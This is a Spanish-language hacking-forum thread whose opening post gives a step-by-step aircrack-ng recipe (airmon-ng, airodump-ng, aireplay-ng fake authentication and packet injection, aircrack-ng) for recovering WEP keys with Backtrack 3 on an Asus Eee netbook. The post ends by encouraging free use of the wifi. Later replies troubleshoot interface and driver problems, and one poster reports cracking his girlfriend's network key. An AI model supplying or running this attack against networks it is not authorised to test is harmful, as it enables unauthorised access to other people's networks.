Página 1 de 2 12 ÚltimoÚltimo
Resultados 1 al 20 de 29

Tema: “Hackea” conexiones Wifi con Backtrack 3 y Asus Eee

  1. #1 “Hackea” conexiones Wifi con Backtrack 3 y Asus Eee 
    HH Administrator Avatar de LUK
    Fecha de ingreso
    Oct 2001
    Ubicación
    SpaÑa
    Mensajes
    5.028
    Descargas
    179
    Uploads
    246
    Esta es una guía para conseguir la claves wep de los puntos wifi protegidos con contraseña usando una distribución de linux llamada Backtrack 3 que instalaremos en un pendrive y nuestro pequeño Asus Eee utilizando Windows xp.

    Yo lo he probado con mi Eee 900 y funciona perfectamente, conseguí el password “que había olvidado” de mi casa en menos de 20 minutos.

    ¿Empezamos?

    Requisitos previos:

    Necesitaremos el Backtrack 3 versión USB: Descargar desde aqui.
    Descomprimimos el archivo y obtenemos dos carpetas que debemos meter en la raiz del pendrive (usb flash memory). Por ejemplo e:

    En windows vamos al menu de inicio > ejecutar > cmd

    Se nos abre una “terminal” de Dos en la que tendremos que navegar hasta el pendrive, en este caso tecleamos e: y pulsamos enter.

    Tecleamos: cd boot para entrar en la carpeta boot que metimos antes en e: (el pendrive). Enter.
    Ahora ejecutamos el archivo bootinst.bat (escribe eso y dale al enter).

    Seguimos las instrucciones y ya deberíamos tener un pendrive “bootable” con el que podremos iniciar el sistema operativo Backtrack 3 antes de arrancar windows.

    Bien, ahora empieza lo divertido…

    Enchufamos el pendrive en el lado izquierdo del eee, no se porqué pero vá mejor.

    Reiniciamos el pc y cuando salga la pantalla gris con el logo del Eee presionamos la tecla Esc.

    Nos saldrá un menu azul que nos permitirá seleccionar desde donde arrancar, elegimos obviamente el pendrive (booteable gracias a los pasos anteriores).

    Ahora salen unas cosas muy raras y le damos a enter y esperamos. Tranquilos, es solo para “acojonar” luego es bastante facil.

    Una vez nos carga el sistema operativo veremos que es muy similar en el aspecto gráfico al windows.

    PASO 1:

    NOTA: Para abrir una terminal presionamos Ctrl+Alt+T o al lado del “menu de inicio” hay un icono cuadrado negro.

    En una terminal pones:

    airmon-ng start wifi0

    a continuación:

    airodump-ng ath1

    cuando encuentres tu red wifi ctrl+c para parar la búsqueda y escribes

    airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1

    donde(no hay que poner corchetes):
    [channel] es el canal
    [AP MAC] es la dirección mac, XX:XX:XX:XX:XX
    [filename] el nombre de archivo que le quieres dar, por ejemplo “casa”, recuerdalo.



    PASO 2:

    Abre una nueva terminal, ya sabes como…

    aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] ath1

    donde:

    [AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la primera terminal.

    Si te sale esto felicidades:

    18:18:20 Sending Authentication Request
    18:18:20 Authentication successful
    18:18:20 Sending Association Request
    18:18:20 Association successful

    Si no, intenta con lo siguiente:

    Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1

    Y te debería salir algo como esto:

    18:22:32 Sending Authentication Request
    18:22:32 Authentication successful
    18:22:32 Sending Association Request
    18:22:32 Association successful
    18:22:42 Sending keep-alive packet
    18:22:52 Sending keep-alive packet

    Si no, olvidate.

    Ahora que ya te funciona hay que empezar a inyectar, espero que no tengas miedo de las agujas…



    PASO 3:

    aireplay-ng -3 -b [AP MAC] ath1 -x 250

    Ahora vete a la nevera y preparate una cocacola y unas aceitunas. En un par de minutos empezarás a ver como
    la columna DATA de la primera terminal empieza a subir (los números, no es que se mueva de posición ¬¬).

    Espera hata tener unos 40.000 más o menos y abre una tercera terminal.



    PASO 4:

    Quiero mi clave yaaaarl!!!

    aircrack-ng -z -b [AP MAC] [filename*.cap]

    En lo de filename deberias poner lo que te dije antes, en tu caso sería casa.cap o lo que hayas puesto.

    Espera otro poquito, y ya te aparecerá la clave, la apuntas en un papel y listo. Reinicia con tu SO favorito
    y disfruta de tu wifi gratis.

    Gracias a http://www.georgehafiz.co.uk/aircrackeeepc.php
    [][][] LUK [][][]
    hackhispano.com
    Citar  
     

  2. #2  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.721
    Descargas
    30
    Uploads
    8
    Cita Iniciado por LUK Ver mensaje
    Y te debería salir algo como esto.... Si no, olvidate.
    Jajaja, que grande
    Una vez con backtrack puedes usar el manual de j8, o consultar la wiki de la suite aircrack para manejarte con todo su potencial

    PD: WLANDECRYPTER+AIRCRACK= WIFI
    Citar  
     

  3. #3 Consulta 
    Iniciado
    Fecha de ingreso
    Jul 2008
    Mensajes
    15
    Descargas
    1
    Uploads
    0
    B.Dias Luk ; te comento mi primera experencia para instalar los programas para consegir las claves WEP.

    El programa wifilax no me baja del todo , y no soy capaz de bajar ni de la pagina original ni del foro.Este programa para que es para reconocer el receptor wifi mio , yo los drives tengo los originales lo he comprado hace poco.

    Segundo el otro programa BT 3 lo he bajado , hago lo que dice la pagina de instalarlo en el Pendrive para que arranque como bootable no ha y manera de hacerlo lo arranco y me arranca el windows.

    Ya me comentaras que pasos seguir o como efectuar , parece facil pero es dificil.Gracias de antemano

    Mi antena receptora wifi es Realtek RTL8187 que me aconsejas o como lo puedo efectuar???
    Última edición por clarinetista; 22-07-2008 a las 15:04
    Citar  
     

  4. #4 problema al cargar Backtrack 3 
    Iniciado
    Fecha de ingreso
    Sep 2008
    Mensajes
    1
    Descargas
    0
    Uploads
    0
    Tengo un Asus Eee PC 901 e intento arrancar Backtrack 3.

    Despues de todo la escritura del arranque me pide un login y contraseña:"root" y "toor"

    despues escribo "startx" y me da error

    Fatal server error:
    AddScreen/screeninit failed for driver 0...........
    Citar  
     

  5. #5  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.721
    Descargas
    30
    Uploads
    8
    Prueba con fluxbox, para iniciar este sistema de escritorio en vez de KDE.
    Citar  
     

  6. #6  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    "Try moving around your mode lines on Depth 16 to "800x600" "640x480" "1024x768" see if that helps the "size" issue. "
    Si la profundidad de color predeterminada no es 16, cámbiala y pon 16.

    http://www.linuxquestions.org/questi...river-0-35019/

    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  7. #7  
    Iniciado
    Fecha de ingreso
    Jul 2006
    Mensajes
    1
    Descargas
    0
    Uploads
    0
    Hola q tal LUK he leido todo el procedimiento q escribes y m parece excelente, muy descriptivo y todo va muy bien hasta que llego al airdrump.

    Te describo q pasa y ojala q m puedas echar la mano, al escribir el airmon-ng start wifi aparece mi tarjeta inalambrica y ahi no hay problema.
    Pero cuando al escribir el airodump-ng ath1 no me muestra ninguna red, aun asi hago sigo adelante
    y aqui es donde reside mi mayor duda cuando pongo el airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1 //obviamente sin corchetes//
    aparece un mensaje q entre todo lo q dice aparece "ath1 no device such" y como apenas estoy aprendiendo linux no se que hacer, he tratado de configurarlo poniendo iwconfig q la verdad no se si se deba y aparece lo siguiente
    # iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    wifi0 no wireless extensions.

    pero al buscar el asistente del wifi y lo abro desde el escritorio y m aparce bien y es mas me detecta mi red y algunas otras, al abrir el manager aparece la tarjeta desactivada pero se activa en el momento y tambien me registra todas las redes.

    Nose que se debe hacer si se debe activar el ath1, ponerlo modo de monitor, instalar algun controlador o no se q mas, agradeceria la ayuda q m puedan dar
    y si lo explican detalladamente estaria mas q agradecido. Cabe decir q se m ha metido esa idea de lograr entrar a mi red sin teclearle la clave y no pienso dejar q m gane, jajaja.

    Gracias
    Citar  
     

  8. #8  
    Avanzado
    Fecha de ingreso
    Sep 2004
    Ubicación
    Me in the middle
    Mensajes
    375
    Descargas
    2
    Uploads
    0
    tambien para gente como yo que el wifislax no soporta la tarjeta wifi (intel 4965agn) se puede bajarel airodump-ng y aireplay-ng, y hackear desde tu distribucion linux que uses, yo probe la wep de la casa de mi novia y la averigue, todo desde mi debian

    los pasos son los mismos nada mas que instale el software mediante apt

    Saludos
    "Las repisas que corroen el saber de la zanahoria, estan estimulando e instituyendo a los colombos de la epoca..."
    Citar  
     

  9. #9  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    Tienes toda la razón ancabi

    Yo siempre he preferido debian para estos menesteres. Las distribuciones especializadas presentan la ventaja de incluír la mayoría de los controladores, pero una vez sabes cuáles necesitas, lo mejor es compilártelos y usar los programas en tu debian

    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  10. #10  
    Iniciado
    Fecha de ingreso
    Sep 2008
    Mensajes
    2
    Descargas
    0
    Uploads
    0
    he realizado los pasos que dijiste en la consola.
    al poner airodump-ng start wifi0 Me sale esto
    Interface Chipset Driver

    pero nada mas...- ningun dato bajo éstos caracteres

    sigo y pongo airodump-ng aht1

    y me dice ésto airodump-ng -- help´´ for help
    y YA está
    QUE PUEDE PASAR..?
    graciasss
    Citar  
     

  11. #11  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    No puedes capturar directamente en wifi0, por eso el primer error.

    Y lo segundo es porque la sintaxis es incorrecta, debes pasar más parámetros a airodump-ng.

    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  12. #12  
    Iniciado
    Fecha de ingreso
    Sep 2008
    Mensajes
    1
    Descargas
    0
    Uploads
    0
    He echao a andar la backtrack3 en el asus eee 901, pero da error al arrancar el modo grafico, si en el boot elijo el driver vesa si m arranca. Pero la resolucion del escritorio me sale a 1024x840 y como el asus es 1024x600 hay parte del escritorio q no m sale en pantalla....

    ¿Alguna forma de arreglarlo?
    Citar  
     

  13. #13  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    man xorg.conf

    Cambia la resolución manualmente y reinicia el servidor gráfico.

    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  14. #14  
    Iniciado
    Fecha de ingreso
    Oct 2008
    Mensajes
    1
    Descargas
    0
    Uploads
    0
    wenas:

    para quien pueda ayudarme.
    1. el entorno parecido a windows no me sale, me sale una ventana parecida a dos para meter comandos.

    2. cuanod llego a airmon-ng start wifio sale:
    interface: wlan0 chipset: intel 4965 a/b/g/n fdriver iwl4967 - [phy0]

    3. cuando meto airodump-nd ath1 sale:
    interface ath1:
    ioctl(siocgifindex) failed: no such device.

    el programa lo copio en un pendrive y despues en u portatil, por favor que alguien me ayude que no entiendo casi nada de linux
    email: editado
    gracias.
    Última edición por j8k6f4v9j; 06-10-2008 a las 09:57
    Citar  
     

  15. #15  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    Si la interfaz es wlan0, el comando
    Código:
    airodump-ng ath1
    , y debería ser
    Código:
    airodump-ng wlan0
    Los comandos más básicos en gnu/Linux, para la configuración de redes inalámbricas, son ifconfig e iwconfig. Lee sus páginas de manual atentamente para saber en qué consisten.

    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  16. #16
    Iniciado
    Fecha de ingreso
    Oct 2008
    Mensajes
    1
    Descargas
    0
    Uploads
    0
    primero cuando iniciamos el backtrack 3 la opcion para ver los graficos es el VESA .... y antes de iniciar el backtrack he leido (lo tengo que provar) que lo que hay que hacer es mirar que este siempre activado el wireless en la bios.... vaya que en la opcion del wireless no sea el restore sii no el enabled
    Citar  
     

  17. #17  
    Avanzado
    Fecha de ingreso
    Sep 2006
    Ubicación
    online
    Mensajes
    789
    Descargas
    5
    Uploads
    0
    felicidades, muy buena la info...
    Citar  
     

  18. #18  
    Iniciado
    Fecha de ingreso
    Jan 2006
    Mensajes
    18
    Descargas
    0
    Uploads
    0
    hola perdonar mi imnorancia pero esto que es Asus Eee
    bueno me contesyo mismo el colega google se chivo pero con un pc normal tambien se puede no ?
    Última edición por tazma; 03-11-2008 a las 21:21
    Citar  
     

  19. #19  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.721
    Descargas
    30
    Uploads
    8
    El asus es simplemente un NetBook, es decir un mini-pc diseñado para ser ligero y portatil.
    Hay muchos otros, Acer One, Medion, HP .........
    Si puedes usar ese sistema en otro portatiles, yo testee el Asus Lite que usan los Acer One como sistema operativo Linux, pero algunos llevan simplemente XP.

    PD: Si lo preguntas por Backtrack lo puedes usar en cualquier equipo.
    Citar  
     

  20. #20  
    Iniciado
    Fecha de ingreso
    Nov 2008
    Mensajes
    2
    Descargas
    0
    Uploads
    0
    hey tengo un proble cuando pongo airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1 me sale este problem
    notice:you specified ''-bssid''.DId you man ''--bssid'' instead?
    Notice channel range already given
    Airodump-ng -- help for help
    Citar  
     

Temas similares

  1. Respuestas: 1
    Último mensaje: 14-07-2016, 17:59
  2. Anonymous hackea la red de un contratista del FBI
    Por chewarrior en el foro CIBERACTIVISMO
    Respuestas: 6
    Último mensaje: 25-01-2012, 01:26
  3. Kaminsky hackea el Daltonismo
    Por clarinetista en el foro CIBERACTIVISMO
    Respuestas: 2
    Último mensaje: 19-12-2010, 18:02
  4. 1º Prueba: Hackea esta Web ;)
    Por N3wBi3 en el foro INGENIERIA INVERSA
    Respuestas: 5
    Último mensaje: 18-01-2004, 23:28
  5. EEUU: ¡'Hackea' por la patria!
    Por Clase en el foro HACK HiSPANO
    Respuestas: 0
    Último mensaje: 08-08-2002, 19:07

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •